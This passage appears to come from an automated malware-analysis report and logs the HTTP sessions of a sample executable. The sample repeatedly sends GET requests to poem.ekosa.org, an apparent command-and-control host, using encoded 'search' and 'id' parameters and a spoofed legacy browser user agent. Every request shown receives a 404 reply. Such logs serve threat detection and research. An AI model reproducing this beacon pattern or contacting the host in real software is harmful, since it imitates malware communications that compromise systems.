      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      56192.168.2.449823210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:29.813901901 CET502OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:30.075021982 CET502INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:29 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      57192.168.2.449824210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:30.446429968 CET503OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:30.707518101 CET507INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:29 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      58192.168.2.449826210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:30.978195906 CET513OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:31.238159895 CET517INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:31 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      59192.168.2.449827210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:31.513567924 CET520OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:31.771861076 CET523INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:31 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      6192.168.2.449765210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:00.138458967 CET122OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:00.403141022 CET123INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:00 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      60192.168.2.449828210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:32.158154011 CET527OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:32.421650887 CET530INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:32 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      61192.168.2.449829210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:32.698961973 CET532OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:32.968071938 CET536INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:32 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      62192.168.2.449830210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:33.239017010 CET538OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:33.502808094 CET541INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:33 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      63192.168.2.449831210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:33.884963036 CET542OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:34.146928072 CET542INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:33 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      64192.168.2.449832210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:34.413079977 CET543OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:34.673830032 CET543INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:34 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      65192.168.2.449833210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:34.952838898 CET544OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
